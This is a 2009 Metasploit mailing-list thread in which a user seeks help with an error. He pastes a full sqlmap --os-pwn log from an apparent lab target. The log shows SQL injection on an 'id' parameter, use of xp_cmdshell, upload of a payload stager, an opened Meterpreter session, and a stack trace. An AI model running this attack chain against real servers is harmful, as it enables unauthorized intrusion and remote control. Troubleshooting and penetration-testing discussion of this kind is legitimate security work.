Metasploit mailing list archives

Meterpreter and sqlmap?


From: etlownoise at gmail.com (Efrain Torres)
Date: Sat, 2 May 2009 13:53:18 -0500

Osman,

Please contact sqlmap author bernardo.damele at gmail.com as it appears
your problem is not related to running sqlmap IN metasploit.

2009/5/1 Carlos P?rez <carlos_perez at darkoperator.com>:
Under what privileges is the database service running under on the target
machine?

Sent from my iPhone
On May 1, 2009, at 5:58 PM, OSMAN ELSAHIB <elsahib10 at hotmail.com> wrote:

hello everyone, i'm getting a very weird problem when running Metasploit
with SQLMAP 0.7 on a Ubuntu machine ( Sun VirtualBox), any ideas?

=========================================================================

root at osman-laptop:/home/User/Desktop/sqlmap# python sqlmap.py -u
"http://192.168.0.12/test.aspx?id=3"; --os-pwn
--msf-path=/home/osman/metasploit

??? sqlmap/0.7rc1
??? by Bernardo Damele A. G. <bernardo.damele at gmail.com>

[*] starting at: 00:36:29

[00:36:29] [INFO] testing connection to the target url
[00:36:32] [INFO] testing if the url is stable, wait a few seconds
[00:36:38] [INFO] url is stable
[00:36:38] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[00:36:45] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[00:36:45] [INFO] testing if Cookie parameter 'ASP.NET_SessionId' is dynamic
[00:36:52] [WARNING] Cookie parameter 'ASP.NE T_SessionId' is not dynamic
[00:36:52] [INFO] testing if GET parameter 'id' is dynamic
[00:36:59] [INFO] confirming that GET parameter 'id' is dynamic
[00:37:15] [INFO] GET parameter 'id' is dynamic
[00:37:15] [INFO] testing sql injection on GET parameter 'id' with 0
parenthesis
[00:37:15] [INFO] testing unescaped numeric injection on GET parameter 'id'
[00:37:29] [INFO] confirming unescaped numeric injection on GET parameter
'id'
[00:37:36] [INFO] GET parameter 'id' is unescaped numeric injectable with 0
parenthesis
[00:37:36] [INFO] testing for parenthesis on injectable parameter
[00:38:02] [INFO] the injectable parameter requires 0 parenthesis
[00:38:02] [INFO] testing MySQL
[00:38:11] [WARNING] the back-end DMBS is not MySQL
[00:38:11] [INFO] testing Oracle
[00:38:20] [WARNING] the back-end DMBS is not Oracle
[00:38:20] [INFO] testing PostgreSQL
[00:38:27] [WARNING] the back-end DMBS is not PostgreSQL
[00:38:27] [INFO] test ing Microsoft SQL Server
[00:38:36] [INFO] confirming Microsoft SQL Server
[00:39:01] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server

[00:39:01] [INFO] testing stacked queries support on parameter 'id'
[00:39:13] [INFO] the web application supports stacked queries on parameter
'id'
[00:39:13] [INFO] testing if current user is DBA
[00:39:13] [INFO] retrieved: 0
[00:39:44] [WARNING] the functionality requested might not work because the
session user is not a database administrator
[00:39:44] [INFO] checking if xp_cmdshell extended procedure is available,
wait..
[00:39:50] [INFO] xp_cmdshell extended procedure is available
[00:40:03] [INFO] creating Metasploit Framework 3 payload stager
which connection type do you want to use?
[1] Bind TCP (default)
[2] Bind TCP (No N X)
[3] Reverse TCP
[4] Reverse TCP (No NX)
2
which is the back-end DBMS address? [192.168.0.12]
which remote port numer do you want to use? [16882] 21
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
11
[00:40:23] [INFO] creation in progress ................ done
[00:40:40] [INFO] compression in progress . done
[00 :40:41] [INFO] uploading payload stager to
'C:/WINDOWS/Temp/sqlmapmsfrerje.exe'
[00:41:23] [INFO] running Metasploit Framework 3 command line interface
locally, wait..
[00:41:23] [INFO] running Metasploit Framework 3 payload stager remotely,
wait..
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.4:50577 -> 192.168.0.12:21)

meterpreter > Loading extension priv...[-]
failure: Interrupted system call
/home/osman/metasploit/lib/rex/io/stream.rb:40:in `syswrite'
/home/osman/metasploit/lib/rex/io/stream.rb:40:in `write'
/home/osman/metasploit/lib/rex/post/meterpreter/packet_dispatcher.rb:59:in
`send_packet'
/home/osman/metas ploit/lib/rex/post/meterpreter/packet_dispatcher.rb:92:in
`send_packet_wait_response'
/home/osman/metasploit/lib/rex/post/meterpreter/client_core.rb:115:in
`load_library'
/home/osman/metasploit/lib/rex/post/meterpreter/client_core.rb:157:in `use'
/home/osman/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:254:in
`cmd_use'
/home/osman/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:242:in
`each'
/home/osman/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:242:in
`cmd_use'
/home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'
/home/osman/metasploit/lib/rex/post/meterpreter/ui/console.rb:94:in
`run_command'
/home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'
/home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/osman/meta sploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'
/home/osman/metasploit/lib/rex/post/meterpreter/ui/console.rb:60:in
`interact'
/home/osman/metasploit/lib/rex/ui/text/shell.rb:123:in `call'
/home/osman/metasploit/lib/rex/ui/text/shell.rb:123:in `run'
/home/osman/metasploit/lib/rex/post/meterpreter/ui/console.rb:58:in
`interact'
/home/osman/metasploit/lib/msf/base/sessions/meterpreter.rb:181:in
`_interact'
/home/osman/metasploit/lib/rex/ui/interactive.rb:48:in `interact'
/home/osman/metasploit/msfcli:246
meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168.0.12:21...
[-] Error in script: undefined method `config' for nil:NilClass
==============================================================================
Elsahib





________________________________
check out the rest of the Windows Live?. More than mail?Windows Live? goes
way beyond your inbox. More than messages

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




Current thread: